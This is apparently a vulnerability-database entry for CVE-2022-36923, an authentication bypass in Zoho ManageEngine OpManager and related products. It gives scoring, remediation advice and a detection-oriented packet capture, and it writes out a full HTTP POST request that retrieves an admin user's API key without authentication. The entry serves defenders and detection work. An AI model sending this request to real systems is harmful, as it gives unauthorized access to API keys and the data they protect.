🔙 목록으로 돌아가기

CVE-2022-36923: Zoho ManageEngine - getUserAPIKey Authentication Bypass

TitleZoho ManageEngine - getUserAPIKey Authentication Bypass
Authordaffainfo,jjcho
SeverityHigh
ImpactAttackers can obtain API keys and access external APIs, leading to potential data theft or unauthorized actions.
RemediationApply the security patches released after 2022-07-28 or update to the latest version.
CVSS Score7.5
EPSS Score0.23665
CVE IDCVE-2022-36923
CWE IDCWE-755,CWE-284
Tags cve cve2022 zoho manageengine opmanager oputils auth-bypass vkev

🔍 Vulnerability Description

Zoho ManageEngine OpManager, OpManager Plus, OpManager MSP, Network Configuration Manager, NetFlow Analyzer, Firewall Analyzer, and OpUtils before 2022-07-27 through 2022-07-28 (125657, 126002, 126104, and 126118) allow unauthenticated attackers to obtain a user’s API key, and then access external APIs.

🌐 HTTP Request

POST /RestAPI/getAPIKey HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

operation=getUserAPIKey&username=admin&domainname=-&HANDSHAKE_KEY=pppppppppppppppppppppppppppppppppppp

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-36923.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-36923.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A